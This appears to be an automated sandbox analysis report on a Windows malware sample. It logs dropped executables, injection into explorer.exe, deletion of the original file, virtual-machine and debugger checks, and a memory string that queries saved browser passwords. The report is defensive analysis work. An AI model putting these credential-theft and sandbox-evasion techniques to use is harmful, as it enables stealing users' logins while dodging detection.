                Source: C:\Users\user\AppData\Local\Temp\6246.exeProcess created: C:\Users\user\AppData\Local\Temp\6246.exe C:\Users\user\AppData\Local\Temp\6246.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\837D.exe C:\Users\user\AppData\Local\Temp\837D.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8C19.exe C:\Users\user\AppData\Local\Temp\8C19.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Users\user\AppData\Local\Temp\7795.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 520
                Source: C:\Users\user\AppData\Local\Temp\837D.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 520
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\idduhcf C:\Users\user\AppData\Roaming\idduhcf
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4316.exe C:\Users\user\AppData\Local\Temp\4316.exe
                Source: C:\Users\user\AppData\Local\Temp\4316.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6246.exe C:\Users\user\AppData\Local\Temp\6246.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\69A9.exe C:\Users\user\AppData\Local\Temp\69A9.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7795.exe C:\Users\user\AppData\Local\Temp\7795.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\837D.exe C:\Users\user\AppData\Local\Temp\837D.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8C19.exe C:\Users\user\AppData\Local\Temp\8C19.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4316.exe C:\Users\user\AppData\Local\Temp\4316.exe
                Source: C:\Users\user\AppData\Local\Temp\6246.exeProcess created: C:\Users\user\AppData\Local\Temp\6246.exe C:\Users\user\AppData\Local\Temp\6246.exe
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6246.tmpJump to behavior
                Source: 8C19.exe, 0000000A.00000003.503706148.0000000000665000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT origin_url,action_url,username_element,username_value,password_element,hex(password_value) password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for FROM logins;
                Source: 8C19.exe, 0000000A.00000003.543193997.00000000023D1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566523088.00000000023D1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.503664897.00000000023C9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.503071576.00000000023B6000.00000004.00000020.00020000.00000000.sdmp, 6AB1.tmp.14.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C6118 CreateToolhelp32Snapshot,Module32First,
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4132
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:916:120:WilError_01
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2188
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCommand line argument: msimg32.dll
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCommand line argument: VVdO
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCommand line argument: 0cA
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Users\user\AppData\Local\Temp\6246.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6246.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8C19.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8C19.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: C:\zuluyoku\gidifi7\lijatimocoy\hucukudorozige sin\xuhuxepu.pdb source: file.exe, thduhcf.1.dr
                Source: Binary string: \C:\zuluyoku\gidifi7\lijatimocoy\hucukudorozige sin\xuhuxepu.pdb source: file.exe, thduhcf.1.dr
                Source: Binary string: C:\nowobuwelajiwu jivebap\wutamaki\havuzoruyudo.pdb source: 6246.exe, 6246.exe, 00000004.00000000.458480067.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000008.00000000.475624690.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe.1.dr
                Source: Binary string: C:\rajor100.pdb source: 69A9.exe, 00000006.00000000.462971903.0000000000401000.00000020.00000001.01000000.00000008.sdmp, idduhcf, 00000013.00000000.560081813.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 69A9.exe.1.dr, idduhcf.1.dr
                Source: Binary string: M"C:\rajor100.pdb source: 69A9.exe, 00000006.00000000.462971903.0000000000401000.00000020.00000001.01000000.00000008.sdmp, idduhcf, 00000013.00000000.560081813.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 69A9.exe.1.dr, idduhcf.1.dr
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: aa C:\nowobuwelajiwu jivebap\wutamaki\havuzoruyudo.pdb6K source: 6246.exe, 00000004.00000000.458480067.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000008.00000000.475624690.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe.1.dr
                Source: Binary string: C:\xifibezevatem\nebopo.pdb source: 7795.exe, 00000007.00000000.474481270.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 837D.exe, 00000009.00000000.476307271.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 837D.exe.1.dr, 7795.exe.1.dr

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\thduhcfUnpacked PE file: 5.2.thduhcf.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeUnpacked PE file: 6.2.69A9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EAFD push ecx; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B3A3 push ecx; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004097A4 push eax; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C7321 push cs; retf
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_004039AF push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0040EB0D push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0040B3B3 push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_004097B4 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_009290AF push ecx; retf
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_004049EA LoadLibraryA,GetProcAddress,VirtualProtect,
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\idduhcfJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\thduhcfJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6246.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\thduhcfJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\837D.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7795.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8C19.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4316.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7AF0.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\idduhcfJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\69A9.exeJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\thduhcf:Zone.Identifier read attributes | delete
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\idduhcf:Zone.Identifier read attributes | delete
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\6246.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\6246.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\6246.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\6246.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: thduhcf, 00000005.00000002.575593576.0000000000862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKW
                Source: file.exe, 00000000.00000002.431534613.00000000008D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKZ
                Source: C:\Users\user\AppData\Local\Temp\8C19.exeRDTSC instruction interceptor: First address: 00000001405B10DA second address: 00000001405B10E3 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 dec ecx 0x00000004 movzx eax, dx 0x00000007 cwd 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\thduhcfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\thduhcfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\thduhcfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\thduhcfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\thduhcfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\thduhcfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Windows\explorer.exe TID: 1380Thread sleep count: 650 > 30
                Source: C:\Windows\explorer.exe TID: 1236Thread sleep count: 234 > 30
                Source: C:\Windows\explorer.exe TID: 1248Thread sleep count: 181 > 30
                Source: C:\Windows\explorer.exe TID: 3376Thread sleep count: 519 > 30
                Source: C:\Windows\explorer.exe TID: 2880Thread sleep count: 104 > 30
                Source: C:\Windows\explorer.exe TID: 1332Thread sleep count: 67 > 30
                Source: C:\Users\user\AppData\Local\Temp\8C19.exe TID: 2004Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\8C19.exe TID: 4740Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\8C19.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 650
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 519
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7AF0.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0092771C rdtsc
                Source: C:\Users\user\AppData\Local\Temp\8C19.exeThread delayed: delay time: 60000
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00404AE9 SetLastError,GetTickCount,GetLogicalDriveStringsW,LocalAlloc,UnregisterWait,GetNamedPipeHandleStateW,InterlockedIncrement,GetPrivateProfileStructA,GetConsoleAliasExesLengthW,EnumCalendarInfoA,EnumDateFormatsW,InterlockedCompareExchange,DeleteFiber,GetPrivateProfileStructA,LeaveCriticalSection,InterlockedExchange,RtlCaptureContext,FindResourceA,LocalFlags,OpenMutexA,GetStringTypeExA,GetComputerNameA,InitializeCriticalSection,LoadLibraryW,GetModuleHandleA,GetProcAddress,InterlockedDecrement,InterlockedDecrement,GetCurrentConsoleFont,GlobalFlags,FindNextVolumeA,GetConsoleFontSize,CreateJobObjectA,GetModuleHandleW,FormatMessageW,CreateActCtxA,GetConsoleTitleA,GetCalendarInfoA,VerifyVersionInfoW,FindFirstChangeNotificationA,InterlockedIncrement,InterlockedDecrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetProfileSectionA,MoveFileWithProgressA,GetCommandLineW,WriteConsoleA,lstrcpynW,CopyFileA,LoadLibraryA,MoveFileWithProgressW,CreateIoCompletionPort,GetOEMCP,InterlockedExchange,GetPrivateProfileStructA,DeleteVolumeMountPointA,GetConsoleAliasesLengthA,GetFileTime,GetStringTypeW,
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                Source: explorer.exe, 00000001.00000000.380417254.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                Source: explorer.exe, 00000001.00000000.387757323.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
                Source: explorer.exe, 00000001.00000000.387757323.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000001.00000000.370625735.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 6246.exe, 00000008.00000002.538446381.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537842924.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533047658.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537990582.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535847326.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535094361.00000000023BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000001.00000000.387757323.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                Source: explorer.exe, 00000001.00000000.380417254.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                Source: 8C19.exe, 0000000A.00000003.537842924.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533047658.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535847326.000000000239E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[{i4
                Source: 8C19.exe, 0000000A.00000003.522070249.00000000023C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: explorer.exe, 00000001.00000000.421056906.00000000087F4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Roaming\thduhcfSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_004049EA LoadLibraryA,GetProcAddress,VirtualProtect,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C59F5 push dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_009260A3 push dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\thduhcfProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00409947 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0092771C rdtsc
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00409085 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,MoveFileA,GetLastError,__dosmaperr,
